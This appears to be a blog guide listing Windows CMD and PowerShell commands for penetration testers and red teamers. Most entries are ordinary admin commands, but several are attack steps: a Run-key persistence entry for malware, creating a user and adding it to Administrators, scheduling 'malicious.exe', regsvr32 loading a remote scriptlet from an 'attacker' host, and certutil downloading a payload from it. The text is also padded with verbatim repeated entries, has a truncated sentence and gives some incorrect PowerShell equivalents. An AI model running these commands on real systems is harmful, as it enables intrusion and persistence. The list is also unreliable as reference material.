Comprehensive Guide to the 50 Most Essential Windows Commands for Penetration Testers and Red Team Operators

learn 50 windows commands for penetration testing and red teaming

Windows commands are essential tools for penetration testers and red team operators. Proficiency with these commands empowers effective reconnaissance, exploitation, privilege escalation, and more. In this comprehensive guide, we delve into the 50 most vital Windows commands, providing detailed explanations, command usage examples, and invaluable insights tailored for penetration testers and red team operators.

1. dir – List Files and Directories

The dir command is a fundamental tool for reconnaissance on Windows systems:

CMD Usage:

C:\> dir              # List files and directories
C:\> dir /s           # List files and directories recursively

PowerShell Usage:

PS C:\> Get-ChildItem  # List files and directories
PS C:\> Get-ChildItem -Recurse  # List files and directories recursively

Tip: Combine with findstr in CMD or Select-String in PowerShell to search for specific filenames or keywords.

2. cd – Change Directory

Navigating directories is essential for accessing target-specific files or locations:

CMD Usage:

C:\> cd Documents     # Change to "Documents" directory

PowerShell Usage:

PS C:\> Set-Location Documents  # Change to "Documents" directory

Tip: Quickly switch to directories containing sensitive data or configuration files.

3. echo – Display Text or Enable/Disable Command Echo

The echo command outputs text to the command prompt or can control command echoing:

CMD Usage:

C:\> echo Hello, world!  # Display text

PowerShell Usage:

PS C:\> Write-Output "Hello, world!"  # Display text

Tip: Utilize echo in batch files or Write-Output in PowerShell scripts.

4. mkdir – Create Directory

Creating directories is essential for organizing your tools, scripts, and findings:

CMD Usage:

C:\> mkdir Reports      # Create "Reports" directory

PowerShell Usage:

PS C:\> New-Item -ItemType Directory -Name Reports  # Create "Reports" directory

Tip: Organize your toolkit by creating folders for specific tasks or projects.

5. copy – Copy Files and Directories

Copying files and directories aids in preserving evidence or deploying payloads:

CMD Usage:

C:\> copy file.txt dir\   # Copy file.txt to dir\

PowerShell Usage:

PS C:\> Copy-Item file.txt dir\  # Copy file.txt to dir\

Tip: Copy malicious files or tools to target systems for exploitation.

6. move – Move and Rename Files

Moving or renaming files is helpful for concealing your actions or modifying system behavior:

CMD Usage:

C:\> move file.txt newdir\  # Move file.txt to newdir\

PowerShell Usage:

PS C:\> Move-Item file.txt newdir\  # Move file.txt to newdir\

Tip: Rename or move files to evade detection or manipulate system behavior.

7. del – Delete Files

Deleting files is essential for covering your tracks or removing evidence:

CMD Usage:

C:\> del file.txt      # Delete file.txt

PowerShell Usage:

PS C:\> Remove-Item file.txt   # Delete file.txt

Tip: Use with caution as this command permanently removes files.

8. type – Display File Contents

Displaying file contents helps understand system configurations and identify vulnerabilities:

CMD Usage:

C:\> type file.txt

PowerShell Usage:

PS C:\> Get-Content file.txt

Tip: Examine configuration files to uncover sensitive information or vulnerabilities.

9. notepad – Open Text Files with Notepad

Opening files with Notepad allows quick examination or modification of contents:

CMD Usage:

C:\> notepad file.txt

PowerShell Usage:

PS C:\> notepad file.txt

Tip: Quickly edit configuration files or analyze logs with Notepad.

10. findstr – Search for Strings in Files

Searching for text patterns is essential for identifying vulnerabilities or sensitive data:

CMD Usage:

C:\> type file.txt | findstr "pattern"

PowerShell Usage:

PS C:\> Get-Content file.txt | Select-String "pattern"

Tip: Uncover vulnerabilities by searching for keywords in configuration files or source code.

11. tasklist – List Running Processes

Listing processes aids in identifying active applications and potential attack vectors:

CMD Usage:

C:\> tasklist         # List running processes

PowerShell Usage:

PS C:\> Get-Process   # List running processes

Tip: Detect suspicious processes or unauthorized applications.

12. taskkill – Terminate Processes

Terminating processes is vital for stopping unwanted or malicious applications:

CMD Usage:

C:\> taskkill /im process.exe /f  # Terminate a process by image name

PowerShell Usage:

PS C:\> Stop-Process -Name process.exe -Force  # Terminate a process by name

Tip: Halt malicious processes or applications that pose a threat.

13. netstat – Display Network Statistics

Monitoring network connections helps identify open ports and network activities:

CMD Usage:

C:\> netstat -ano    # Display active network connections

PowerShell Usage:

PS C:\> Get-NetTCPConnection  # Display active network connections

Tip: Identify active connections and potential attack vectors.

14. ipconfig – Display IP Configuration

Viewing IP configuration aids in understanding network settings and potential vulnerabilities:

CMD Usage:

C:\> ipconfig         # Display IP configuration

PowerShell Usage:

PS C:\> Get-NetIPAddress  # Display IP configuration

Tip: Identify IP addresses, network interfaces, and DNS configurations.

15. ping – Test Network Connectivity

Testing network connectivity helps identify live hosts and assess network latency:

CMD Usage:

C:\> ping

PowerShell Usage:

PS C:\> Test-Connection

Tip: Determine if a target is reachable and assess network responsiveness.

16. nslookup – DNS Lookup

Performing DNS lookups is useful for resolving hostnames or IP addresses:

CMD Usage:

C:\> nslookup

PowerShell Usage:

PS C:\> Resolve-DnsName

Tip: Gather information about target systems through DNS records.

17. wmic – Windows Management Instrumentation Command-line

Interacting with Windows Management Instrumentation helps gather system information:

CMD Usage:

C:\> wmic process list brief

PowerShell Usage:

PS C:\> Get-WmiObject Win32_Process  # List processes

Tip: Collect information about processes, services, and hardware configurations.

18. systeminfo – Display System Information

Viewing system information provides insights into the operating system and hardware:

CMD Usage:

C:\> systeminfo

PowerShell Usage:

PS C:\> Get-ComputerInfo

Tip: Gather details about the system, OS version, and installed updates.

19. reg query – Query Registry Information

Interacting with the Windows Registry assists in gathering system configuration details:

CMD Usage:

C:\> reg query HKLM\Software\Microsoft\Windows\CurrentVersion /v ProductName

PowerShell Usage:

PS C:\> Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion" -Name "ProductName"

Tip: Extract information from the registry, such as installed software or settings.

20. reg add and reg delete – Modify Registry Entries

Modifying registry entries aids in altering system configurations or disabling security settings:

CMD Usage:

C:\> reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Malware" /t REG_SZ /d "C:\malware.exe"

PowerShell Usage:

PS C:\> Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Malware" -Value "C:\malware.exe"

Tip: Modify startup entries for persistence or disable security mechanisms.

21. net user – Manage User Accounts

Managing user accounts is crucial for privilege escalation and lateral movement:

CMD Usage:

C:\> net user newuser newpassword /add  # Add a new user

PowerShell Usage:

PS C:\> New-LocalUser -Name newuser -Password (ConvertTo-SecureString -String "newpassword" -AsPlainText -Force) -AccountNeverExpires

Tip: Exploit weak user accounts or escalate privileges by creating new users.

22. net localgroup – Manage Local Groups

Managing local groups is essential for privilege escalation and controlling system access:

CMD Usage:

C:\> net localgroup Administrators newuser /add  # Add user to Administrators group

PowerShell Usage:

PS C:\> Add-LocalGroupMember -Group "Administrators" -Member "newuser"

Tip: Escalate privileges by adding users to high-privileged groups.

23. net share – Manage Shared Resources

Managing shared resources helps identify vulnerabilities or lateral movement opportunities:

CMD Usage:

C:\> net share         # List shared resources

PowerShell Usage:

PS C:\> Get-SmbShare   # List shared resources

Tip: Identify exposed file shares for potential exploitation.

24. net use – Connect to Shared Resources

Connecting to shared resources assists in lateral movement and data exfiltration:

CMD Usage:

C:\> net use \\target\share /user:username password

PowerShell Usage:

PS C:\> New-SmbMapping -LocalPath "Z:" -RemotePath "\\target\share" -Username username -Password (ConvertTo-SecureString -String "password" -AsPlainText -Force)

Tip: Map network drives for easy access to shared resources.

25. netstat – Display Network Statistics

Monitoring network connections helps identify open ports and network activities:

CMD Usage:

C:\> netstat -ano    # Display active network connections

PowerShell Usage:

PS C:\> Get-NetTCPConnection  # Display active network connections

Tip: Identify active connections and potential attack vectors.

26. route – Display or Modify Network Routing

Displaying or modifying network routing is useful for pivoting or network manipulation:

CMD Usage:

C:\> route print      # Display routing table

PowerShell Usage:

PS C:\> Get-NetRoute  # Display routing table

Tip: Modify network routing to redirect traffic for exploitation.

27. netsh – Network Shell

Interacting with network settings and configurations helps manipulate network behavior:

CMD Usage:

C:\> netsh wlan show profiles         # Display Wi-Fi profiles

PowerShell Usage:

PS C:\> Get-NetConnectionProfile   # Display Wi-Fi profiles

Tip: Manipulate firewall rules or discover saved Wi-Fi passwords.

28. whoami – Display User and Group Information

Displaying user and group information helps understand available privileges:

CMD Usage:

C:\> whoami

PowerShell Usage:

PS C:\> whoami /groups

Tip: Determine your user context and associated groups for privilege analysis.

29. systeminfo – Display System Information

Viewing system information provides insights into the operating system and hardware:

CMD Usage:

C:\> systeminfo

PowerShell Usage:

PS C:\> Get-ComputerInfo

Tip: Gather details about the system, OS version, and installed updates.

30. driverquery – Display Installed Device Drivers

Listing installed device drivers aids in identifying potential vulnerabilities:

CMD Usage:

C:\> driverquery

PowerShell Usage:

PS C:\> Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion

Tip: Identify outdated or vulnerable device drivers for exploitation.

31. sc – Service Control

Interacting with Windows services helps control system behavior and persistence:

CMD Usage:

C:\> sc query          # List all services

PowerShell Usage:

PS C:\> Get-Service    # List all services

Tip: Disable or modify services for persistence or to disable security mechanisms.

32. schtasks – Schedule Tasks

Scheduling tasks aids in persistence and automated exploitation:

CMD Usage:

C:\> schtasks /create /tn "My

Task" /tr "malicious.exe" /sc daily /st 00:00

PowerShell Usage:

PS C:\> Register-ScheduledTask -TaskName "MyTask" -Action (New-ScheduledTaskAction -Execute "malicious.exe") -Trigger (New-ScheduledTaskTrigger -Daily -At 00:00)

Tip: Schedule malicious payloads or backdoors for automated execution.

33. regsvr32 – Register and Unregister DLLs

Registering or unregistering DLLs can aid in executing malicious code or maintaining persistence:

CMD Usage:

C:\> regsvr32 /s /i:http://attacker/evil.sct scrobj.dll  # Register with remote content

PowerShell Usage:

PS C:\> rundll32.exe malicious.dll,EntryPoint

Tip: Exploit DLL hijacking vulnerabilities or execute malicious scripts.

34. cipher – Manage File Encryption

Managing file encryption helps protect sensitive data or manipulate encrypted files:

CMD Usage:

C:\> cipher /e filename.txt    # Encrypt file

PowerShell Usage:

PS C:\> Protect-CmsMessage -To -From -Subject "Encrypted Message" -Body "This is a secret message" -OutFile "encryptedMessage.txt"

Tip: Encrypt files for data exfiltration or manipulate encrypted data.

35. tasklist – List Running Processes

Listing processes aids in identifying active applications and potential attack vectors:

CMD Usage:

C:\> tasklist         # List running processes

PowerShell Usage:

PS C:\> Get-Process   # List running processes

Tip: Detect suspicious processes or unauthorized applications.

36. taskkill – Terminate Processes

Terminating processes is vital for stopping unwanted or malicious applications:

CMD Usage:

C:\> taskkill /im process.exe /f  # Terminate a process by image name

PowerShell Usage:

PS C:\> Stop-Process -Name process.exe -Force  # Terminate a process by name

Tip: Halt malicious processes or applications that pose a threat.

37. powercfg – Power Configuration

Interacting with power configurations can assist in controlling system behavior and persistence:

CMD Usage:

C:\> powercfg /hibernate off      # Disable hibernation

PowerShell Usage:

PS C:\> Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Power" -Name "HibernateEnabled" -Value 0

Tip: Manipulate power settings for system manipulation or preservation.

38. wmic – Windows Management Instrumentation Command-line

Interacting with Windows Management Instrumentation helps gather system information:

CMD Usage:

C:\> wmic process list brief

PowerShell Usage:

PS C:\> Get-WmiObject Win32_Process  # List processes

Tip: Collect information about processes, services, and hardware configurations.

39. msfconsole – Metasploit Framework Console

Using Metasploit aids in exploiting vulnerabilities and conducting penetration tests:

CMD and PowerShell Usage:

C:\> msfconsole

Tip: Exploit known vulnerabilities using Metasploit’s extensive collection of modules.

40. certutil – File Utility for Downloading and Displaying Files

Interacting with certificates aids in downloading files or executing malicious payloads:

CMD Usage:

C:\> certutil -urlcache -f http://attacker/malicious.exe C:\malicious.exe

PowerShell Usage:

PS C:\> Invoke-WebRequest -Uri http://attacker/malicious.exe -OutFile C:\malicious.exe

Tip: Download malicious files for exploitation or lateral movement.

41. nmap – Network Mapping and Port Scanning

Using Nmap assists in network reconnaissance and identifying potential attack vectors:

CMD and PowerShell Usage:

C:\> nmap -sV -p 1-1000 target

Tip: Identify open ports and services on target systems for exploitation.

42. netsh – Network Shell

Interacting with network settings and configurations helps manipulate network behavior:

CMD Usage:

C:\> netsh wlan show profiles         # Display Wi-Fi profiles

PowerShell Usage:

PS C:\> Get-NetConnectionProfile   # Display Wi-Fi profiles

Tip: Manipulate firewall rules or discover saved Wi-Fi passwords.

43. net user – Manage User Accounts

Managing user accounts is crucial for privilege escalation and lateral movement:

CMD Usage:

C:\> net user newuser newpassword /add  # Add a new user

PowerShell Usage:

PS C:\> New-LocalUser -Name newuser -Password (ConvertTo-SecureString -String "newpassword" -AsPlainText -Force) -AccountNeverExpires

Tip: Exploit weak user accounts or escalate privileges by creating new users.

44. net localgroup – Manage Local Groups

Managing local groups is essential for privilege escalation and controlling system access:

CMD Usage:

C:\> net localgroup Administrators newuser /add  # Add user to Administrators group

PowerShell Usage:

PS C:\> Add-LocalGroupMember -Group "Administrators" -Member "newuser"

Tip: Escalate privileges by adding users to high-privileged groups.

45. net share – Manage Shared Resources

Managing shared resources helps identify vulnerabilities or lateral movement opportunities:

CMD Usage:

C:\> net share         # List shared resources

PowerShell Usage:

PS C:\> Get-SmbShare   # List shared resources

Tip: Identify exposed file shares for potential exploitation.

46. net use – Connect to Shared Resources

Connecting to shared resources assists in lateral movement and data exfiltr


CMD Usage:

C:\> net use \\target\share /user:username password

PowerShell Usage:

PS C:\> New-SmbMapping -LocalPath "Z:" -RemotePath "\\target\share" -Username username -Password (ConvertTo-SecureString -String "password" -AsPlainText -Force)

Tip: Map network drives for easy access to shared resources.

47. netstat – Display Network Statistics

Monitoring network connections helps identify open ports and network activities:

CMD Usage:

C:\> netstat -ano    # Display active network connections

PowerShell Usage:

PS C:\> Get-NetTCPConnection  # Display active network connections

Tip: Identify active connections and potential attack vectors.

48. route – Display or Modify Network Routing

Displaying or modifying network routing is useful for pivoting or network manipulation:

CMD Usage:

C:\> route print      # Display routing table

PowerShell Usage:

PS C:\> Get-NetRoute  # Display routing table

Tip: Modify network routing to redirect traffic for exploitation.

49. netsh – Network Shell

Interacting with network settings and configurations helps manipulate network behavior:

CMD Usage:

C:\> netsh wlan show profiles         # Display Wi-Fi profiles

PowerShell Usage:

PS C:\> Get-NetConnectionProfile   # Display Wi-Fi profiles

Tip: Manipulate firewall rules or discover saved Wi-Fi passwords.

50. whoami – Display User and Group Information

Displaying user and group information helps understand available privileges:

CMD Usage:

C:\> whoami

PowerShell Usage:

PS C:\> whoami /groups

Tip: Determine your user context and associated groups for privilege analysis.

Mastering these 50 Windows commands is a crucial step toward becoming a skilled penetration tester or red team operator. By honing your skills with these tools, you’ll be well-equipped to navigate a variety of scenarios, from reconnaissance to exploitation and beyond. As you continually refine your abilities, delve into more advanced Windows concepts and expand your toolkit, you’ll develop the expertise needed to excel in the dynamic field of cybersecurity. Best of luck in your journey of penetration testing and red teaming!